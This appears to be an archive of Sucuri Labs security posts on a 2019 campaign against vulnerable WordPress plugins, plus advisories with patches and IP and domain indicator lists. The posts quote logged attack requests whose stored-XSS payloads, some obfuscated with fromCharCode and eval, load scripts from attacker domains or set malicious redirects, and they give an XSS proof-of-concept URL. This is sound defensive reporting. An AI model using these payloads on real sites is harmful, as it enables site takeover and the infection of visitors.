John Castro, Author at Sucuri Labs

Plugins added to Malware Campaign: November 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins since January. Please check our previous updates below:

Plugins Under Attack: November 2019

Although attackers focused on infecting sites via attack vectors described here, we were able to detect the same behavior aiming plugins at the very end of this month.

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Folders

46.101.174.128 - type=attachment&width=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Ftop.worldctraffic.com%2Ftop%27%3E%3C%2Fscript%3E%3Cstyle%3E [23/Nov/2019:12:19:33 +0000] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

Simple Fields

46.101.174.128 - action=simple_fields_do_import&import-json=%7B%0A++++%22field_groups%22%3A+%7B%0A++++++++%221%22%3A+%7B%0A++++++++++++%22id%22%3A+1%2C%0A++++++++++++%22key%22%3A+%22test%22%2C%0A++++++++++++%22slug%22%3A+%22test%22%2C%0A++++++++++++%22name%22%3A+%22test%22%2C%0A++++++++++++%22description%22%3A+%22%22%2C%0A++++++++++++%22repeatable%22%3A+false%2C%0A++++++++++++%22fields%22%3A+%5B%5D%2C%0A++++++++++++%22fields_by_slug%22%3A+%5B%5D%2C%0A++++++++++++%22deleted%22%3A+false%2C%0A++++++++++++%22gui_view%...skipped...%22deleted%22%3A+false%2C%0A++++++++++++%22hide_editor%22%3A+false%2C%0A++++++++++++%22added_with_code%22%3A+false%2C%0A++++++++++++%22field_groups_count%22%3A+1%0A++++++++%7D%0A++++%7D%2C%0A++++%22post_type_defaults%22%3A+%5B%0A++++++++false%0A++++%5D%0A%7D&import-what=textarea&simple-fields-import-type=replace [23/Nov/2019:13:02:05 +0000] "POST /wp-admin/admin-post.php HTTP/1.1"

Malicious Domains and IPs:

IPs:

198.12.70.83
89.238.167.46
181.58.70.192
84.237.142.110
91.215.187.211
46.101.174.128

Domains Injected:

https[:]//top[.]worldctraffic[.]com/cas?/java.js?t=2&

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Dec 2, 2019 by John Castro

Wrong content-type to XSS

WordPress Social Sharing Plugin – Sassy Social Share, which currently has over 100000 installations just fixed a Cross Site Scripting Vulnerability. This bug allows attackers to send custom links that direct unsuspecting users toward a vulnerable page. From this page, they often employ a variety of methods to trigger their proof of concept.

Let’s take a look to the patch:

+++ b/sassy-social-share.new/public/class-sassy-social-share-public.php
@@ -1511,6 +1511,7 @@ class Sassy_Social_Share_Public {
        private function ajax_response( $response ) {
                $response = apply_filters( 'heateor_sss_ajax_response_filter', $response );
+               header( 'Content-Type: application/json' );
                die( json_encode( $response ) );

        }
@@ -1540,7 +1541,7 @@ class Sassy_Social_Share_Public {
                if ( isset( $_GET['urls'] ) && count( $_GET['urls'] ) > 0 ) {
                        $target_urls = array_unique( $_GET['urls'] );
                        foreach ( $target_urls as $k => $v ) {
-                               $target_urls[$k] = esc_attr( $v );
+                               $target_urls[esc_attr( $k )] = esc_attr( $v );
                        }
                }

JSON data returned to the user didn’t have a content type defined in the function _ajaxresponse() and the default is html. This together with the following snipped allowing any authenticated user consume that endpoint makes this bug really easy for attackers to exploit:

includes/class-sassy-social-share.php
205:        add_action( 'wp_ajax_heateor_sss_sharing_count', array( $plugin_public, 'fetch_share_counts' ) );
206:        add_action( 'wp_ajax_nopriv_heateor_sss_sharing_count', array( $plugin_public, 'fetch_share_counts' ) );

Because of the nature of the bug, and due this issue was already fixed, we can share a simple PoC that shows how a malicious link abusing this vulnerability might be presented:

http://vulnerablesite.com/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<h onmouseover%3Dalert(1)>]=hola.com&urls[1]=hola2.com

If you have an old version of this plugin installed please update to the latest version (3.3.4) asap. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

Nov 22, 2019 by John Castro

Plugins added to Malware Campaign: October 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: October 2019

Blog Designer (New Payload)
WPeMatico RSS Feed Fetcher
Smart Google Code Inserter (New Payload)
Post Custom Templates Lite (New Payload)
Woody Ad Snippets
FV Flowplayer Video Player
Poll, Survey, Form & Quiz Maker
DELUCKS SEO
Social Metrics Tracker

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Blog Designer

185.238.0.214 - action=save&blog_nonce=save&custom_css=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27%26%23x64%3B%26%23x61%3B%26%23x74%3B%26%23x61%3B%26colon%3B%26%23x74%3B%26%23x65%3B%26%23x78%3B%26%23x74%3B%26sol%3B...skipped...%3B%26lpar%3B%26%23x63%3B%26rpar%3B%26semi%3B%26rcub%3B%27%3E%3C%2Fscript%3E%3Cstyle%3E&updated=true] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WPeMatico RSS Feed Fetcher

159.65.65.204 - "GET /wp-admin/admin-post.php?wpematico-action=settings_tab_settings HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

Smart Google Code Inserter

192.169.159.241 - action=savegooglecode&home=https://track.beforwardplay.com/track/uu?t=1&&sgcgoogleanalytic=<script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var c &equals; b&period;createEle&#...skipped...arCode&lpar;104&comma;101&comma;97&comma;100&rpar;&rpar;&lsqb;0&rsqb;&period;appendChild&lpar;c&rpar;&semi;&rcub;'></script>&sgcwebtools=&siteurl=https://track.beforwardplay.com/track/uu.js?t=1& "POST /wp-admin/admin-ajax.php HTTP/1.1"

Post Custom Templates Lite

192.99.38.186 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=</textarea><script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var&...skipped...&lpar;c&rpar;&semi;&rcub;'></script> "POST /wp-admin/admin-post.php HTTP/1.1"

Woody Ad Snippets

162.241.149.54 - --fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22wbcr_inp_import_files\x22; filename=\x22lc.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x22generator\x22:\x22x\x22,\x22date_created\x22:\x22x\x22,\x22snippets\x22:[{\x22name\x22:\x22x\x22,\x22title\x22:\x22\x22,\x22content\x22:\x22x\x22,\x22location\x22:\x22header\x22,\x22type\x22:\x22php\x22,\x22filters\x22:\x22\x22,\x22changed_filters\x22:\x220\x22,\x22scope\x22:\x22everywhere\x22,\x22description\x22:\x22<script type=text/javascript src='https://cls.balantfromsun.com/cls.js?z=1&&v=2'></script>\x22,\x22attributes\x22:\x22\x22,\x22tags\x22:[]}]}\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22swpsmtp_import_settings\x22\x0D\x0A\x0D\x0A1\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aswpsmtp_clear_log\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5--\x0D\x0A] "POST /wp-admin/admin-post.php HTTP/1.1"

FV Flowplayer Video Player

162.241.149.54 - action=fv_wp_flowplayer_email_signup&email=%3Csvg%2Fonload%3Deval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C49%2C55%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3E%40test.com&list=1 [08/Oct/2019:12:54:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Poll, Survey, Form & Quiz Maker

50.63.162.9 -  "GET /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://cd.privacylocationforloc.com/track&v15'></script> HTTP/1.1"

DELUCKS SEO

167.99.232.64 - dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bdpc_status_basic_metadata%5D=1&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives%5D%5Btitle%5D%5Bdelimiter%5D=-&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives...skipped...5Bgoogle%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Bpinterest%5D=&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Byandex%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc_save_settings=1 "POST /wp-admin/admin-post.php HTTP/1.1"

Social Metrics Tracker

50.63.162.9 - gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v5%27%3E%3C%2Fscript%3E "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Malicious Domains and IPs:

IPs:

159.65.65.204
192.169.243.42
167.99.232.64
50.63.162.9
192.169.159.241
185.238.0.214
192.99.38.186
159.203.175.216
80.211.164.226
162.241.149.53
186.147.2.49

Domains Injected:

track[.]beforwardplay[.]com
cls[.]balantfromsun[.]com
cd[.]privacylocationforloc[.]com
bes[.]belaterbewasthere[.]com
ave[.]cervantes[.]es
hungthinhsg[.]com[.]vn

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Nov 6, 2019 by John Castro

Plugins added to Malware Campaign: September 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: September 2019

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Rich Reviews

149.202.215.42 - read-more-text=Readme+more%22%3B%3C%2Fscript%3E%3Cscript+type%3Dtext%2Fjavascript+%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C98%2C101%2C1...skipped...%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cscript%3E&update=rr-update-options [28/Sep/2019] "POST /wp-admin/admin-post.php?page=fp_admin_options_page"

Blog Designer

62.76.25.158 - action=save&custom_css=%3C%2Fstyle%3E%3Cscript+++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_fr2cdmdy7%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_y78qgjy8u%2A%2F%2C116%2F%2A_y78qgjy8u%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_58zwawter%2A%2F%2C47%2F%2A_1scpswrsv%2A%2F%2C47%2F%2A_58zwawter%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_fr2cdmdy7%2A%2F%2C115%2F%2A_58zwawter%2A%2F%2C46%2F%2A_fr2cdmdy7%2A...skipped...B_y78qgjy8u.send%28+null+%29%3Breturn+_y78qgjy8u.responseText%3B%7Dfunction+_wwsyflqj0%28todo%29%7B+var+_avq14iyav+%3D+new+Function%28%27x%27%2C+%27y%27%2C+todo%2B%27+return+x%2By%3B%27%29%3B_avq14iyav%280%2C0%29%3B%7D%3C%2Fscript%3E%3Cstyle%3E&updated=true [23/Sep/2019:05:04:38 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Coming Soon Page and Maintenance Mode

62.76.25.158 - action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&hook=general&logo_enable=on&logo_height=1&logo_width=1&rcsp_description=%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_vw5ansga3qp4fwa%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_w1g30wg9f776x67%2A%2F%2C116%2F%2A_w1g30wg9f776x67%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C47%2F%2A_ug3v7obje18b87n%2A%2F%2C47%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_vw5ansga3qp4fwa%2A%2F%2C115%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C46%2F%2A_vw5ansga3qp4fwa%2A%2F%2C99%2F%2A_ug3v7obje18b87n%2A%2F%2C114%2F%2A_vw5ansga3qp4fwa%2A%2F%2C101%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C97%2F%2A%2A%2F%2C116%2F%2A%2A%2F%2C101%2F%2A%2A%2F%2C114%2F%2A_ug3v7obje18b87n%2A%2F%2C101%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C108%2F%2A%2A%2F%2C97%2F%2A_w1g30wg9f776x67%2A%2F%2C116%2F%2A_ug3v7obje18b87n%2A%2F%2C105%2F%2A%2A%2F%2C118%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C101%2F%2A_ug3v7obje18b87n%2A%2F%2C99%2F%2A_vw5ansga3qp4fwa%2A%2F%2C104%2F%2A_w1g30wg9f776x67%2A%2F%2C97%..skipped...%29%3B_pr3rd9vm0zvo3tw%280%2C0%29%3B%7D%3C%2Fscript%3E&rcsp_headline=was+here&rcsp_logo_url=https%3A%2F%2Fave.cervantes.es%2Fsites%2Fdefault%2Ffiles%2Fdemocursos_aveglobal.jpg [23/Sep/2019] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1"

WP Quick Booking Manager

62.76.25.158 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_3evx21%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_tp5mxm%2A%2F%2C116%2F%2A_tp5mxm%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_h01hcw%2A%2F%2C47%2F%2A_tx1yiy%2A%2F%2C47%2F%2A_h01hcw%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_3evx21%2A%2F%2C115%2F%2A_h01hcw%2A%2F%2C46%2F%2A_3evx21%2A%2F%2C99%2F%2A_tx1yiy%2A%2F%2C114%2F%2A_3evx21%2A%2F%2C101%2F%2A_h01hcw%2A%2F...skipped...iy%28_0wg1jn%29%7B+var+_tp5mxm+%3D+new+XMLHttpRequest%28%29%3B_tp5mxm.open%28+String.fromCharCode%2871%2C69%2C84%29%2C+_0wg1jn%2C+false+%29%3B_tp5mxm.send%28+null+%29%3Breturn+_tp5mxm.responseText%3B%7Dfunction+_ocrrhn%28todo%29%7B+var+_fta15b+%3D+new+Function%28%27x%27%2C+%27y%27%2C+todo%2B%27+return+x%2By%3B%27%29%3B_fta15b%280%2C0%29%3B%7D%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [23/Sep/2019:05:04:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WP Private Content Plus

62.76.25.158 - submit=Save%2BChanges&wppcp_general%5Bpost_page_redirect_url%5D=https%3A%2F%2Fdns.createrelativechanging.com%2Fsub%2Ftfso.js%3Fz%3D6%26&wppcp_general%5Bprivate_content_module_status%5D=1&wppcp_general%5Bprivate_mod%5D=1&wppcp_tab=wppcp_section_general [23/Sep/2019] "POST /wp-admin/admin-ajax.php?page=wppcp-settings HTTP/1.1"

woocommerce-ajax-filters

78.142.211.111 - - [18/Sep/2019] "GET /wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors HTTP/1.1"

Malicious Domains and IPs:

149.202.215.42
62.76.25.158
132.148.27.189
185.212.128.201
213.128.89.176
167.99.232.64
207.154.198.108
159.203.86.82
192.95.14.196
162.241.175.243
104.248.237.226
104.238.72.132
46.101.174.128
51.68.204.149
188.166.188.152
104.236.178.208
162.243.13.195
45.252.249.240
158.69.194.57
139.59.116.30
78.142.211.111
192.95.14.196
51.38.38.1
91.234.217.135
82.223.69.53
51.158.72.203
162.243.165.84
175.126.62.37
104.238.99.130
45.32.104.33
139.99.106.10
153.126.194.159
142.44.151.107
186.202.161.191
192.169.243.42
178.62.93.109
159.65.155.168
217.182.95.250

Domains Injected:

dns.createrelativechanging[.]com
bes.belaterbewasthere[.]com
gabriellalovecats[.]com
www.dzobainteriors[.]com
ns1.bullgoesdown[.]com

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Oct 3, 2019 by John Castro

Plugins Under Attack: August 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: August 2019

Plugins that are continuing to be leveraged by attackers for months are:

Plugin Payloads Added to the Campaign

Simple-301-redirects-addon-bulk-uploader

178.128.193.158 - --43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22301_bulk_redirects\x22; filename=\x22301_redirects.csv\x22\x0D\x0AContent-Type: application/csv\x0D\x0A\x0D\x0A/,https://developsincelock.com/54768?\x0D\x0A*,https://developsincelock.com/5868?\x0D\x0A/*,https://developsincelock.com/34234?\x0D\x0A\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22submit_bulk_301\x22\x0D\x0A\x0D\x0A1\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22auto_detect_end_line\x22\x0D\x0A\x0D\x0A0\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22wpnonce\x22\x0D\x0A\x0D\x0A887cc0cb2f\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp-admin/options-general.php?page=301bulkoptions\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911--\x0D\x0A [28/Aug/2019:13:56:32 +0000] "POST /wp-admin/admin-post.php?page=301bulkoptions HTTP/1.1"

Kiwi-Social-Share

162.243.126.96 - action=kiwi_social_share_set_option&args=%7B%27option%27%3A+%27users_can_register%27%2C+%27value%27%3A+%271%27%7D [17/Aug/2019:13:00:36 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Nd-learning

158.69.194.57 - action=nd_learning_import_settings_php_function&nd_learning_value_import_settings=siteurl%5Bnd_learning_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_learning_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-ajax.php?nd_learning_value_import_settings=siteurl[nd_learning_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_learning_end_option] HTTP/1.1"

158.69.194.57 - action=nd_stats_import_settings_php_function&nd_stats_value_import_settings=siteurl%5Bnd_stats_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_stats_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-post.php?nd_stats_value_import_settings=siteurl[nd_stats_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_stats_end_option] HTTP/1.1"

158.69.194.57 - action=nd_travel_import_settings_php_function&nd_travel_value_import_settings=home%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret%3Fl%3D1%26%5Bnd_travel_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=home[nd_travel_option_value]https://jackielovedogs.com/pret?l=1&[nd_travel_end_option] HTTP/1.1"

Responsive-coming-soon

158.69.194.57 - action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&logo_enable=off&rcsp_description=off&rcsp_headline=%3Cscript+async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%28116%2C114%2C101%2C114%2C53%2C55%2C56%2C52%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+Strin...skipped...%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E [09/Aug/2019:03:02:53 +0000] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1"

Nd-donations

158.69.194.57 - action=nd_donations_import_settings_php_function&nd_donations_value_import_settings=siteurl%5Bnd_donations_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_donations_end_option%5D [09/Aug/2019:03:02:53 +0000] "POST /wp-admin/admin-post.php?nd_donations_value_import_settings=siteurl[nd_donations_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_donations_end_option] HTTP/1.1"

Malicious Domains and IPs:

IPs:

185.238.0.34
45.12.32.105
45.12.32.102
185.238.0.33
178.128.193.158
37.122.209.28
217.61.56.11
185.18.226.161
188.213.166.219
162.243.126.96
192.169.227.95
149.202.75.164
185.104.184.109
192.169.255.17
45.12.32.102
185.238.0.35
158.69.194.57
185.238.0.146
45.12.32.55
185.238.0.133

Domains Injected:

*   **wiilberedmodels.com[.]com**
*   **hungthinhsg[.]com[.]vn**
*   **developsincelock[.]com**
*   **bbwebsitecontent[.]com**
*   **bachatours[.]com**
*   **tomorrowwillbehotmaybe[.]com**
*   **jackielovedogs[.]com**
*   **gabriellalovecats[.]com**

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Sep 19, 2019 by John Castro

Unauthenticated settings update in woocommerce-ajax-filters

woocommerce-ajax-filters, which currently has over 10,000 installations (versions <=1.3.6) allows unauthenticated attackers to arbitrarily update all the plugin options and redirect any user to an external malicious URL when the product section is visited. The bug takes advantage of a misunderstanding of the admin_init hook’s execution context.

if( is_admin() ) {
      require_once dirname( __FILE__ ) . '/includes/wizard.php';
}
[...]

function wizard_selectors($wizard) {
[...]
 <div class="wizard_custom_js_css" style="display: none;">
    <h3><?php _e('User custom CSS style', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_custom_css]">
        <?php echo br_get_value_from_array($option, array('user_custom_css')) ?>
    </textarea>
    <h3><?php _e('JavaScript Before Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][before_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'before_update')) ?>
    </textarea>
    <h3><?php _e('JavaScript On Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][on_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'on_update')) ?>
    </textarea>
    <h3><?php _e('JavaScript After Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][after_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'after_update')) ?>
    </textarea>
</div>

[...]

What's the problem with the code above?

Developer assumed that WordPress’s admin_init hook are only called when an administrator user visited a page inside /wp-admin/
The plugin settings allow users to add custom javascript code

A patch was released a few days ago to address this vulnerability.

Because of the nature of the bug, specifically it’s severity, we will not be disclosing additional details. We are seeing malicious requests being used in the wild. While most of them target /wp-admin/admin-post.php, other endpoints in the /wp-admin/ directory can be used to trigger the admin_init hook and exploit the vulnerability.

Malicious IPs attacking this plugin:

175.126.62.37
104.238.99.130
45.32.104.33
139.99.106.10
153.126.194.159
162.241.175.243
51.68.204.149
162.243.165.84
142.44.151.107
186.202.161.191
46.105.17.29
192.169.243.42
186.202.161.191
159.65.65.204
192.30.164.48
51.158.72.203
178.62.93.109
139.59.116.30
213.128.89.176
138.68.181.84

If you have an old version of this plugin installed please update to the latest version (1.3.7) asap. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

Sep 18, 2019 by John Castro

Lack of controls when using WordPress’ update_option() with...

As mentioned in recent posts, WordPress’ update_option() function is used to update any option in the options database table. If the permission flow when using this function isn’t correctly implemented by developers, attackers can gain admin access or inject arbitrary data into any site.

This is the case for the plugin Login or Logout Menu Item, which currently has over 10,000 installations (versions <= 1.1.1). This vulnerability allows unauthenticated attackers to arbitrarily update some plugin options and redirect any user to an external malicious URL.

function lolmi_save_settings() { 
if(isset($_POST['lolmi_settings_submit'])) { 

$login_page_url = (isset($_POST['lolmi_login_page_url']) && !empty($_POST['lolmi_login_page_url'])) ? $_POST['lolmi_login_page_url'] : wp_login_url(); $login_redirect_url = (isset($_POST['lolmi_login_redirect_url']) && !empty($_POST['lolmi_login_redirect_url'])) ? $_POST['lolmi_login_redirect_url'] : home_url(); $logout_redirect_url = (isset($_POST['lolmi_logout_redirect_url']) && !empty($_POST['lolmi_logout_redirect_url'])) ? $_POST['lolmi_logout_redirect_url'] : home_url(); 

update_option('lolmi_login_page_url', esc_url_raw($login_page_url)); 
update_option('lolmi_login_redirect_url', esc_url_raw($login_redirect_url));
update_option('lolmi_logout_redirect_url', esc_url_raw($logout_redirect_url)); 

[...]
} 
}

What's the problem with the function above?

It updates the key “_lolmi_login_pageurl” with any value provided by the user
Does not check for capability
Does not check nonce

A patch was released on August 5th, 2019 to address this vulnerability:

--Version: 1.1.1
++Version: 1.2.0
Plugin URI: https://caseproof.com

[…]
 ++ <?php wp_nonce_field('lolmi_nonce'); ?>
<input type="submit" id="lolmi_settings_submit" name="lolmi_settings_submit" value="<?php _e('Save Settings', 'lolmi'); ?>" class="button button-primary" />
</form>
[…]      
function lolmi_save_settings() {
 if(isset($_POST['lolmi_settings_submit'])) {
++if(!current_user_can('manage_options')) { die("Cheating eh?"); }
++check_admin_referer('lolmi_nonce');
[...]

With just a few lines of code in the right place, developers can avoid security issues related to the misuse of this function and keep their users safe.

